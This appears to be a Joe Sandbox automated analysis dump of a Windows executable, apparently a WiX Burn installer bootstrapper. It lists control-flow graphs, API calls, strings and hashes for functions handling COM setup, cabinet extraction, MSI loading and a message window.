                                                                                                                                                                    control_flow_graph 905 ca10fb-ca1127 CoInitializeEx 906 ca113b-ca1186 call cbf483 905->906 907 ca1129-ca1136 call cc0237 905->907 913 ca1188-ca11ab call c83821 call cc0237 906->913 914 ca11b0-ca11d2 call cbf4a4 906->914 912 ca139e-ca13b0 call cae06f 907->912 935 ca1397-ca1398 CoUninitialize 913->935 922 ca11d8-ca11e0 914->922 923 ca128c-ca1297 SetEvent 914->923 924 ca138f-ca1392 call cbf4b4 922->924 925 ca11e6-ca11ec 922->925 926 ca1299-ca12a3 GetLastError 923->926 927 ca12d6-ca12e4 WaitForSingleObject 923->927 924->935 925->924 929 ca11f2-ca11fa 925->929 932 ca12b0 926->932 933 ca12a5-ca12ae 926->933 930 ca1318-ca1323 ResetEvent 927->930 931 ca12e6-ca12f0 GetLastError 927->931 936 ca11fc-ca11fe 929->936 937 ca1274-ca1287 call cc0237 929->937 940 ca135a-ca1360 930->940 941 ca1325-ca132f GetLastError 930->941 938 ca12fd 931->938 939 ca12f2-ca12fb 931->939 942 ca12b2 932->942 943 ca12b4-ca12c4 call c83821 932->943 933->932 935->912 944 ca1200 936->944 945 ca1211-ca1214 936->945 937->924 949 ca12ff 938->949 950 ca1301-ca1316 call c83821 938->950 939->938 946 ca138a 940->946 947 ca1362-ca1365 940->947 951 ca133c 941->951 952 ca1331-ca133a 941->952 942->943 965 ca12c9-ca12d1 call cc0237 943->965 957 ca1202-ca1204 944->957 958 ca1206-ca120f 944->958 961 ca126e 945->961 962 ca1216 945->962 946->924 959 ca1386-ca1388 947->959 960 ca1367-ca1381 call c83821 947->960 949->950 950->965 954 ca133e 951->954 955 ca1340-ca1355 call c83821 951->955 952->951 954->955 955->965 967 ca1270-ca1272 957->967 958->967 959->924 960->965 961->967 969 ca126a-ca126c 962->969 970 ca122b-ca1230 962->970 971 ca1239-ca123e 962->971 972 ca124e-ca1253 962->972 973 ca125c-ca1261 962->973 974 ca121d-ca1222 962->974 975 ca1232-ca1237 962->975 976 ca1263-ca1268 962->976 977 ca1240-ca1245 962->977 978 ca1247-ca124c 962->978 979 ca1224-ca1229 962->979 980 ca1255-ca125a 962->980 965->924 967->923 967->937 969->937 970->937 971->937 972->937 973->937 974->937 975->937 976->937 977->937 978->937 979->937 980->937
                                                                                                                                                                    APIs
                                                                                                                                                                    • CoInitializeEx.OLE32(00000000,00000000), ref: 00CA111D
                                                                                                                                                                    • CoUninitialize.COMBASE ref: 00CA1398
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000001.00000002.2021038629.0000000000C81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                    • Associated: 00000001.00000002.2021024580.0000000000C80000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021068287.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021089145.0000000000CEA000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021103697.0000000000CED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_1_2_c80000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: InitializeUninitialize
                                                                                                                                                                    • String ID: <the>.cab$Failed to extract all files from container, erf: %d:%X:%d$Failed to initialize COM.$Failed to initialize cabinet.dll.$Failed to reset begin operation event.$Failed to set operation complete event.$Failed to wait for begin operation event.$Invalid operation for this state.$cabextract.cpp
                                                                                                                                                                    • API String ID: 3442037557-1168358783
                                                                                                                                                                    • Opcode ID: 90e4d21f1366fa700fcdbc97a23c625f551a068d83437fc9743b9806f1f2d0f3
                                                                                                                                                                    • Instruction ID: fa8cc03480cdf176321be7274fca7289fb4f38b03d404687609fda584d58a7b9
                                                                                                                                                                    • Opcode Fuzzy Hash: 90e4d21f1366fa700fcdbc97a23c625f551a068d83437fc9743b9806f1f2d0f3
                                                                                                                                                                    • Instruction Fuzzy Hash: 235149369812A3E78F205A958C06FAF36149B43B68F2A033AFD11FB3A1D615CD0096D5
                                                                                                                                                                    Function 00C842D7 Relevance: 28.2, APIs: 10, Strings: 6, Instructions: 158stringCOMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 986 c842d7-c8432e InitializeCriticalSection * 2 call c94d05 * 2 991 c84452-c8445c call c8b48b 986->991 992 c84334 986->992 997 c84461-c84465 991->997 993 c8433a-c84347 992->993 995 c8434d-c84379 lstrlenW * 2 CompareStringW 993->995 996 c84445-c8444c 993->996 998 c843cb-c843f7 lstrlenW * 2 CompareStringW 995->998 999 c8437b-c8439e lstrlenW 995->999 996->991 996->993 1000 c84474-c8447c 997->1000 1001 c84467-c84473 call cc0237 997->1001 998->996 1002 c843f9-c8441c lstrlenW 998->1002 1003 c8448a-c8449f call c83821 999->1003 1004 c843a4-c843a9 999->1004 1001->1000 1007 c84422-c84427 1002->1007 1008 c844b6-c844d0 call c83821 1002->1008 1015 c844a4-c844ab 1003->1015 1004->1003 1009 c843af-c843bf call c829ce 1004->1009 1007->1008 1012 c8442d-c8443d call c829ce 1007->1012 1008->1015 1021 c8447f-c84488 1009->1021 1022 c843c5 1009->1022 1012->1021 1024 c8443f 1012->1024 1019 c844ac-c844b4 call cc0237 1015->1019 1019->1000 1021->1019 1022->998 1024->996
                                                                                                                                                                    APIs
                                                                                                                                                                    • InitializeCriticalSection.KERNEL32(00000000,?,00000000,00000000,?,?,00C85266,?,?,00000000,?,?), ref: 00C84303
                                                                                                                                                                    • InitializeCriticalSection.KERNEL32(000000D0,?,?,00C85266,?,?,00000000,?,?), ref: 00C8430C
                                                                                                                                                                    • lstrlenW.KERNEL32(burn.filehandle.attached,000004B8,000004A0,?,?,00C85266,?,?,00000000,?,?), ref: 00C84352
                                                                                                                                                                    • lstrlenW.KERNEL32(burn.filehandle.attached,burn.filehandle.attached,00000000,?,?,00C85266,?,?,00000000,?,?), ref: 00C8435C
                                                                                                                                                                    • CompareStringW.KERNEL32(0000007F,00000001,?,00000000,?,?,00C85266,?,?,00000000,?,?), ref: 00C84370
                                                                                                                                                                    • lstrlenW.KERNEL32(burn.filehandle.attached,?,?,00C85266,?,?,00000000,?,?), ref: 00C84380
                                                                                                                                                                    • lstrlenW.KERNEL32(burn.filehandle.self,?,?,00C85266,?,?,00000000,?,?), ref: 00C843D0
                                                                                                                                                                    • lstrlenW.KERNEL32(burn.filehandle.self,burn.filehandle.self,00000000,?,?,00C85266,?,?,00000000,?,?), ref: 00C843DA
                                                                                                                                                                    • CompareStringW.KERNEL32(0000007F,00000001,?,00000000,?,?,00C85266,?,?,00000000,?,?), ref: 00C843EE
                                                                                                                                                                    • lstrlenW.KERNEL32(burn.filehandle.self,?,?,00C85266,?,?,00000000,?,?), ref: 00C843FE
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000001.00000002.2021038629.0000000000C81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                    • Associated: 00000001.00000002.2021024580.0000000000C80000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021068287.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021089145.0000000000CEA000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021103697.0000000000CED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_1_2_c80000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: lstrlen$CompareCriticalInitializeSectionString
                                                                                                                                                                    • String ID: Failed to initialize engine section.$Failed to parse file handle: '%ls'$Missing required parameter for switch: %ls$burn.filehandle.attached$burn.filehandle.self$engine.cpp
                                                                                                                                                                    • API String ID: 3039292287-3209860532
                                                                                                                                                                    • Opcode ID: c33b86d0a75b03ad9bd35373e07c303f750233e9b375f214b828df09da136f32
                                                                                                                                                                    • Instruction ID: dded3567717fca7d73424c33793444a5dfac33adbc7dfa506b420774bd84b915
                                                                                                                                                                    • Opcode Fuzzy Hash: c33b86d0a75b03ad9bd35373e07c303f750233e9b375f214b828df09da136f32
                                                                                                                                                                    • Instruction Fuzzy Hash: D951A571A40216BFCB28EFA9DC47F5A776CEF44764F100129F614A7290D770AD50CBA8
                                                                                                                                                                    Function 00C9E7B4 Relevance: 28.1, APIs: 11, Strings: 5, Instructions: 137registryCOMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 1026 c9e7b4-c9e7f1 1027 c9e813-c9e834 RegisterClassW 1026->1027 1028 c9e7f3-c9e807 TlsSetValue 1026->1028 1030 c9e86e-c9e8a5 CreateWindowExW 1027->1030 1031 c9e836-c9e840 GetLastError 1027->1031 1028->1027 1029 c9e809-c9e80e 1028->1029 1032 c9e93d-c9e953 UnregisterClassW 1029->1032 1035 c9e8dc-c9e8f0 SetEvent 1030->1035 1036 c9e8a7-c9e8b1 GetLastError 1030->1036 1033 c9e84d 1031->1033 1034 c9e842-c9e84b 1031->1034 1040 c9e84f 1033->1040 1041 c9e854-c9e869 call c83821 1033->1041 1034->1033 1039 c9e91c-c9e927 GetMessageW 1035->1039 1037 c9e8be 1036->1037 1038 c9e8b3-c9e8bc 1036->1038 1042 c9e8c0 1037->1042 1043 c9e8c5-c9e8da call c83821 1037->1043 1038->1037 1044 c9e929 1039->1044 1045 c9e8f2-c9e8f5 1039->1045 1040->1041 1053 c9e935-c9e93c call cc0237 1041->1053 1042->1043 1043->1053 1044->1032 1048 c9e92b-c9e930 1045->1048 1049 c9e8f7-c9e906 IsDialogMessageW 1045->1049 1048->1053 1049->1039 1052 c9e908-c9e916 TranslateMessage DispatchMessageW 1049->1052 1052->1039 1053->1032
                                                                                                                                                                    APIs
                                                                                                                                                                    • TlsSetValue.KERNEL32(?,?), ref: 00C9E7FF
                                                                                                                                                                    • RegisterClassW.USER32(?), ref: 00C9E82B
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00C9E836
                                                                                                                                                                    • CreateWindowExW.USER32(00000080,00CD9E54,00000000,90000000,80000000,00000008,00000000,00000000,00000000,00000000,?,?), ref: 00C9E89D
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00C9E8A7
                                                                                                                                                                    • UnregisterClassW.USER32(WixBurnMessageWindow,?), ref: 00C9E945
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000001.00000002.2021038629.0000000000C81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                    • Associated: 00000001.00000002.2021024580.0000000000C80000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021068287.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021089145.0000000000CEA000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021103697.0000000000CED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_1_2_c80000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ClassErrorLast$CreateRegisterUnregisterValueWindow
                                                                                                                                                                    • String ID: Failed to create window.$Failed to register window.$Unexpected return value from message pump.$WixBurnMessageWindow$uithread.cpp
                                                                                                                                                                    • API String ID: 213125376-288575659
                                                                                                                                                                    • Opcode ID: cf2c26b3bad7a368c1c6e4b726f5f74e4a4957d4f2203cfdb0489f5e14d82e05
                                                                                                                                                                    • Instruction ID: bc61e91f85937007ecf3b29f568dea8164734d1a43ae2ac5fa2644c746dcd36d
                                                                                                                                                                    • Opcode Fuzzy Hash: cf2c26b3bad7a368c1c6e4b726f5f74e4a4957d4f2203cfdb0489f5e14d82e05
                                                                                                                                                                    • Instruction Fuzzy Hash: 90417076900215ABDF20DBE5DC49FDEBFB8EF18750F154126F915AB290DB309E408BA4
                                                                                                                                                                    Function 00C8C28F Relevance: 26.4, APIs: 8, Strings: 7, Instructions: 131fileCOMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 1056 c8c28f-c8c2c1 1057 c8c32b-c8c347 GetCurrentProcess * 2 DuplicateHandle 1056->1057 1058 c8c2c3-c8c2e1 CreateFileW 1056->1058 1059 c8c349-c8c353 GetLastError 1057->1059 1060 c8c381 1057->1060 1061 c8c383-c8c389 1058->1061 1062 c8c2e7-c8c2f1 GetLastError 1058->1062 1065 c8c360 1059->1065 1066 c8c355-c8c35e 1059->1066 1060->1061 1063 c8c38b-c8c391 1061->1063 1064 c8c393 1061->1064 1067 c8c2fe 1062->1067 1068 c8c2f3-c8c2fc 1062->1068 1071 c8c395-c8c3a3 SetFilePointerEx 1063->1071 1064->1071 1072 c8c362 1065->1072 1073 c8c367-c8c37f call c83821 1065->1073 1066->1065 1069 c8c300 1067->1069 1070 c8c305-c8c318 call c83821 1067->1070 1068->1067 1069->1070 1084 c8c31d-c8c326 call cc0237 1070->1084 1075 c8c3da-c8c3e0 1071->1075 1076 c8c3a5-c8c3af GetLastError 1071->1076 1072->1073 1073->1084 1081 c8c3fe-c8c404 1075->1081 1082 c8c3e2-c8c3e6 call ca1741 1075->1082 1079 c8c3bc 1076->1079 1080 c8c3b1-c8c3ba 1076->1080 1085 c8c3be 1079->1085 1086 c8c3c3-c8c3d8 call c83821 1079->1086 1080->1079 1090 c8c3eb-c8c3ef 1082->1090 1084->1081 1085->1086 1094 c8c3f6-c8c3fd call cc0237 1086->1094 1090->1081 1091 c8c3f1 1090->1091 1091->1094 1094->1081
                                                                                                                                                                    APIs
                                                                                                                                                                    • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,08000080,00000000,?,00000000,00000000,?,00C8C47F,00C85405,?,?,00C85445), ref: 00C8C2D6
                                                                                                                                                                    • GetLastError.KERNEL32(?,00C8C47F,00C85405,?,?,00C85445,00C85445,00000000,?,00000000), ref: 00C8C2E7
                                                                                                                                                                    • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002,?,00000000,00000000,?,00C8C47F,00C85405,?,?,00C85445,00C85445,00000000,?), ref: 00C8C336
                                                                                                                                                                    • GetCurrentProcess.KERNEL32(000000FF,00000000,?,00C8C47F,00C85405,?,?,00C85445,00C85445,00000000,?,00000000), ref: 00C8C33C
                                                                                                                                                                    • DuplicateHandle.KERNELBASE(00000000,?,00C8C47F,00C85405,?,?,00C85445,00C85445,00000000,?,00000000), ref: 00C8C33F
                                                                                                                                                                    • GetLastError.KERNEL32(?,00C8C47F,00C85405,?,?,00C85445,00C85445,00000000,?,00000000), ref: 00C8C349
                                                                                                                                                                    • SetFilePointerEx.KERNELBASE(?,00000000,00000000,00000000,00000000,?,00C8C47F,00C85405,?,?,00C85445,00C85445,00000000,?,00000000), ref: 00C8C39B
                                                                                                                                                                    • GetLastError.KERNEL32(?,00C8C47F,00C85405,?,?,00C85445,00C85445,00000000,?,00000000), ref: 00C8C3A5
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000001.00000002.2021038629.0000000000C81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                    • Associated: 00000001.00000002.2021024580.0000000000C80000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021068287.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021089145.0000000000CEA000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021103697.0000000000CED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_1_2_c80000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorLast$CurrentFileProcess$CreateDuplicateHandlePointer
                                                                                                                                                                    • String ID: Failed to duplicate handle to container: %ls$Failed to move file pointer to container offset.$Failed to open container.$Failed to open file: %ls$container.cpp$crypt32.dll$feclient.dll
                                                                                                                                                                    • API String ID: 2619879409-373955632
                                                                                                                                                                    • Opcode ID: 9f1c2c7dbcc6298559054925578cac86110d452c0ed3e0cdcc42b3fa86d57976
                                                                                                                                                                    • Instruction ID: 789858a1b2a1bfe802f633c2648e8b58bcb3549ad47812c5e49f29d4de4d6a3f
                                                                                                                                                                    • Opcode Fuzzy Hash: 9f1c2c7dbcc6298559054925578cac86110d452c0ed3e0cdcc42b3fa86d57976
                                                                                                                                                                    • Instruction Fuzzy Hash: B741D676140201ABDB20AF59CD89F5B3BA6EB85724F21842DF914DB291D731CC02DB74
                                                                                                                                                                    Function 00CC2AF7 Relevance: 26.3, APIs: 7, Strings: 8, Instructions: 79libraryloaderCOMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 1097 cc2af7-cc2b17 call c83838 1100 cc2b1d-cc2b2b call cc4a6c 1097->1100 1101 cc2c21-cc2c25 1097->1101 1105 cc2b30-cc2b4f GetProcAddress 1100->1105 1103 cc2c2f-cc2c35 1101->1103 1104 cc2c27-cc2c2a call cc5636 1101->1104 1104->1103 1107 cc2b56-cc2b6f GetProcAddress 1105->1107 1108 cc2b51 1105->1108 1109 cc2b76-cc2b8f GetProcAddress 1107->1109 1110 cc2b71 1107->1110 1108->1107 1111 cc2b96-cc2baf GetProcAddress 1109->1111 1112 cc2b91 1109->1112 1110->1109 1113 cc2bb6-cc2bcf GetProcAddress 1111->1113 1114 cc2bb1 1111->1114 1112->1111 1115 cc2bd6-cc2bef GetProcAddress 1113->1115 1116 cc2bd1 1113->1116 1114->1113 1117 cc2bf6-cc2c10 GetProcAddress 1115->1117 1118 cc2bf1 1115->1118 1116->1115 1119 cc2c17 1117->1119 1120 cc2c12 1117->1120 1118->1117 1119->1101 1120->1119
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 00C83838: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00C83877
                                                                                                                                                                      • Part of subcall function 00C83838: GetLastError.KERNEL32 ref: 00C83881
                                                                                                                                                                      • Part of subcall function 00CC4A6C: GetLastError.KERNEL32(?,00000000,00000000,00000000,00000000,00000001), ref: 00CC4A9D
                                                                                                                                                                    • GetProcAddress.KERNEL32(MsiDeterminePatchSequenceW,00000000), ref: 00CC2B41
                                                                                                                                                                    • GetProcAddress.KERNEL32(MsiDetermineApplicablePatchesW), ref: 00CC2B61
                                                                                                                                                                    • GetProcAddress.KERNEL32(MsiEnumProductsExW), ref: 00CC2B81
                                                                                                                                                                    • GetProcAddress.KERNEL32(MsiGetPatchInfoExW), ref: 00CC2BA1
                                                                                                                                                                    • GetProcAddress.KERNEL32(MsiGetProductInfoExW), ref: 00CC2BC1
                                                                                                                                                                    • GetProcAddress.KERNEL32(MsiSetExternalUIRecord), ref: 00CC2BE1
                                                                                                                                                                    • GetProcAddress.KERNEL32(MsiSourceListAddSourceExW), ref: 00CC2C01
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000001.00000002.2021038629.0000000000C81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                    • Associated: 00000001.00000002.2021024580.0000000000C80000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021068287.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021089145.0000000000CEA000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021103697.0000000000CED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_1_2_c80000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AddressProc$ErrorLast$DirectorySystem
                                                                                                                                                                    • String ID: Msi.dll$MsiDetermineApplicablePatchesW$MsiDeterminePatchSequenceW$MsiEnumProductsExW$MsiGetPatchInfoExW$MsiGetProductInfoExW$MsiSetExternalUIRecord$MsiSourceListAddSourceExW
                                                                                                                                                                    • API String ID: 2510051996-1735120554
                                                                                                                                                                    • Opcode ID: 802db75e7d27fbe6117bcc274a44e3f8b38d6a2067a61f799671202905e76883
                                                                                                                                                                    • Instruction ID: 85e4d14120e45c39c182e65a86232668f5fabc4692b8be87f61c654258b729e1
                                                                                                                                                                    • Opcode Fuzzy Hash: 802db75e7d27fbe6117bcc274a44e3f8b38d6a2067a61f799671202905e76883
                                                                                                                                                                    • Instruction Fuzzy Hash: 6331CEB096029AEBDB1A9F21ED82B7F7BB8F720748F00113AF4145A270E7B50D45AF54
                                                                                                                                                                    Function 00CC304F Relevance: 24.7, APIs: 8, Strings: 6, Instructions: 153libraryloadercomCOMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 1121 cc304f-cc3073 GetModuleHandleA 1122 cc30a8-cc30b9 GetProcAddress 1121->1122 1123 cc3075-cc307f GetLastError 1121->1123 1124 cc30fc 1122->1124 1125 cc30bb-cc30df GetProcAddress * 3 1122->1125 1126 cc308c 1123->1126 1127 cc3081-cc308a 1123->1127 1130 cc30fe-cc311b CoCreateInstance 1124->1130 1128 cc30f8-cc30fa 1125->1128 1129 cc30e1-cc30e3 1125->1129 1131 cc308e 1126->1131 1132 cc3093-cc30a3 call c83821 1126->1132 1127->1126 1128->1130 1129->1128 1134 cc30e5-cc30e7 1129->1134 1135 cc31b1-cc31b3 1130->1135 1136 cc3121-cc3123 1130->1136 1131->1132 1144 cc31c7-cc31cc 1132->1144 1134->1128 1140 cc30e9-cc30f6 1134->1140 1137 cc31b5-cc31bc 1135->1137 1138 cc31c6 1135->1138 1141 cc3128-cc3138 1136->1141 1137->1138 1152 cc31be-cc31c0 ExitProcess 1137->1152 1138->1144 1140->1130 1142 cc313a-cc313e 1141->1142 1143 cc3142 1141->1143 1142->1141 1145 cc3140 1142->1145 1147 cc3144-cc3154 1143->1147 1148 cc31ce-cc31d0 1144->1148 1149 cc31d4-cc31d9 1144->1149 1151 cc315c 1145->1151 1153 cc3166-cc316a 1147->1153 1154 cc3156-cc315a 1147->1154 1148->1149 1155 cc31db-cc31dd 1149->1155 1156 cc31e1-cc31e8 1149->1156 1151->1153 1157 cc316c-cc317f call cc31eb 1153->1157 1158 cc3195-cc31a6 1153->1158 1154->1147 1154->1151 1155->1156 1157->1135 1163 cc3181-cc3193 1157->1163 1158->1135 1161 cc31a8-cc31af 1158->1161 1161->1135 1163->1135 1163->1158
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetModuleHandleA.KERNEL32(kernel32.dll,00000000,00000000,00CC3609,00000000,?,00000000), ref: 00CC3069
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00CAC025,?,00C85405,?,00000000,?), ref: 00CC3075
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 00CC30B5
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00CC30C1
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,Wow64EnableWow64FsRedirection), ref: 00CC30CC
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00CC30D6
                                                                                                                                                                    • CoCreateInstance.OLE32(00CEB6B8,00000000,00000001,00CCB818,?,?,?,?,?,?,?,?,?,?,?,00CAC025), ref: 00CC3111
                                                                                                                                                                    • ExitProcess.KERNEL32 ref: 00CC31C0
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000001.00000002.2021038629.0000000000C81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                    • Associated: 00000001.00000002.2021024580.0000000000C80000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021068287.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021089145.0000000000CEA000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021103697.0000000000CED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_1_2_c80000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AddressProc$CreateErrorExitHandleInstanceLastModuleProcess
                                                                                                                                                                    • String ID: IsWow64Process$Wow64DisableWow64FsRedirection$Wow64EnableWow64FsRedirection$Wow64RevertWow64FsRedirection$kernel32.dll$xmlutil.cpp
                                                                                                                                                                    • API String ID: 2124981135-499589564
                                                                                                                                                                    • Opcode ID: f294670152d453589c55cb8e578ef0ffecb49eef542c2076cf35dcaa8f2e0091
                                                                                                                                                                    • Instruction ID: cf23d73bdc25b6ff62436a6dd5b883297c733d86a11297521fd93cdb98711cf7
                                                                                                                                                                    • Opcode Fuzzy Hash: f294670152d453589c55cb8e578ef0ffecb49eef542c2076cf35dcaa8f2e0091
                                                                                                                                                                    • Instruction Fuzzy Hash: A941E272B01295AFCB259BA9DC45FAEB7B8EF44750F15806CE911EB240CB71DF408B90
                                                                                                                                                                    Function 00CBFCAE Relevance: 24.6, APIs: 6, Strings: 8, Instructions: 76libraryloaderCOMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 1165 cbfcae-cbfcc9 call c83824 1168 cbfccb-cbfcef GetProcAddress * 2 1165->1168 1169 cbfcf1 1165->1169 1170 cbfcf6-cbfcfd 1168->1170 1169->1170 1171 cbfcff-cbfd01 1170->1171 1172 cbfd07-cbfd1a call c83824 1170->1172 1171->1172 1173 cbfdae 1171->1173 1175 cbfdb8-cbfdbc 1172->1175 1177 cbfd20-cbfd39 GetProcAddress 1172->1177 1173->1175 1178 cbfd3b-cbfd3d 1177->1178 1179 cbfd6c-cbfd85 GetProcAddress 1177->1179 1178->1179 1180 cbfd3f-cbfd49 GetLastError 1178->1180 1179->1173 1181 cbfd87-cbfd89 1179->1181 1182 cbfd4b-cbfd54 1180->1182 1183 cbfd56 1180->1183 1181->1173 1184 cbfd8b-cbfd95 GetLastError 1181->1184 1182->1183 1185 cbfd58 1183->1185 1186 cbfd5d-cbfd5e 1183->1186 1187 cbfda2 1184->1187 1188 cbfd97-cbfda0 1184->1188 1185->1186 1189 cbfd60-cbfd6a call c83821 1186->1189 1190 cbfda9-cbfdac 1187->1190 1191 cbfda4 1187->1191 1188->1187 1189->1175 1190->1189 1191->1190
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetProcAddress.KERNELBASE(SystemFunction040,AdvApi32.dll), ref: 00CBFCD6
                                                                                                                                                                    • GetProcAddress.KERNEL32(SystemFunction041), ref: 00CBFCE8
                                                                                                                                                                    • GetProcAddress.KERNEL32(CryptProtectMemory,Crypt32.dll), ref: 00CBFD2B
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?), ref: 00CBFD3F
                                                                                                                                                                    • GetProcAddress.KERNEL32(CryptUnprotectMemory), ref: 00CBFD77
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?), ref: 00CBFD8B
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000001.00000002.2021038629.0000000000C81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                    • Associated: 00000001.00000002.2021024580.0000000000C80000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021068287.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021089145.0000000000CEA000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021103697.0000000000CED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_1_2_c80000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AddressProc$ErrorLast
